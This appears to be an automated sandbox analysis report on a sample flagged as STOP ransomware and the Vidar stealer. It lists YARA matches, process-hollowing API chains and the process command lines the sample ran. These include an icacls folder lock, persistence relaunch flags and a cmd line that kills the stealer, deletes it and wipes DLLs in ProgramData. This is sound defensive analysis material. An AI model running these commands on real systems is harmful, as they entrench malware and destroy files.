Source: 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000002.00000000.370049298.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000002.00000000.370049298.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 00000011.00000000.444362220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000011.00000000.444362220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.397769175.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000008.00000000.397769175.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.443754682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000011.00000000.443754682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000002.00000000.368979177.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000002.00000000.368979177.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.410091603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000009.00000000.410091603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.413797668.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0000000B.00000000.413797668.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.414793604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0000000B.00000000.414793604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.441751183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000011.00000000.441751183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000002.00000000.370467390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000002.00000000.370467390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.411271784.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000009.00000000.411271784.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.416333867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0000000B.00000000.416333867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.412392232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000009.00000000.412392232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.397205913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000008.00000000.397205913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111

Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: String function: 02240160 appears 31 times
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: String function: 02238EC0 appears 38 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 0040C660 appears 104 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 0040C820 appears 142 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 02178EC0 appears 38 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 00428C81 appears 57 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 0042F7C0 appears 93 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 00420EC2 appears 40 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 02180160 appears 31 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 0044F23E appears 90 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 00428520 appears 103 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 00450870 appears 52 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 00454E50 appears 46 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 00441A25 appears 44 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 0044F26C appears 37 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 004547A0 appears 64 times
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: String function: 00422587 appears 32 times

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 6_2_02150110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,		6_2_02150110
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Code function: 7_2_02210110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,		7_2_02210110

Source: Q5W0I0pzFI.exe	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: build2[1].exe.8.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Source: Q5W0I0pzFI.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

File created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda

Jump to behavior

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@30/275@8/4

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

2_2_00411900

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 0_2_00409E23 VerLanguageNameW,SetDefaultCommConfigW,ReadConsoleOutputCharacterW,BuildCommDCBA,CopyFileExA,FindNextFileW,SetEvent,FreeResource,GetVersionExA,SetLastError,TerminateThread,DeleteTimerQueueTimer,FillConsoleOutputCharacterA,

0_2_00409E23

Source: Q5W0I0pzFI.exe	Virustotal: Detection: 33%
Source: Q5W0I0pzFI.exe	ReversingLabs: Detection: 38%

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

File read: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Jump to behavior

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Q5W0I0pzFI.exe "C:\Users\user\Desktop\Q5W0I0pzFI.exe"
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\Desktop\Q5W0I0pzFI.exe "C:\Users\user\Desktop\Q5W0I0pzFI.exe"
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\Desktop\Q5W0I0pzFI.exe "C:\Users\user\Desktop\Q5W0I0pzFI.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe --Task
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\Desktop\Q5W0I0pzFI.exe "C:\Users\user\Desktop\Q5W0I0pzFI.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe --Task
Source: unknown	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Process created: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe"
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im build2.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Process created: C:\Windows\System32\audiodg.exe C:\Windows\system32\AUDIODG.EXE 0x258
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\Desktop\Q5W0I0pzFI.exe "C:\Users\user\Desktop\Q5W0I0pzFI.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\Desktop\Q5W0I0pzFI.exe "C:\Users\user\Desktop\Q5W0I0pzFI.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\Desktop\Q5W0I0pzFI.exe "C:\Users\user\Desktop\Q5W0I0pzFI.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart	Jump to behavior
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Process created: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe"
Source: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe	Process created: C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
Source: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im build2.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "build2.exe")

Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe

Code function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,EntryPoint,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

2_2_0040D240

Source: build2.exe, 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: build2.exe, 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: build2.exe, 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
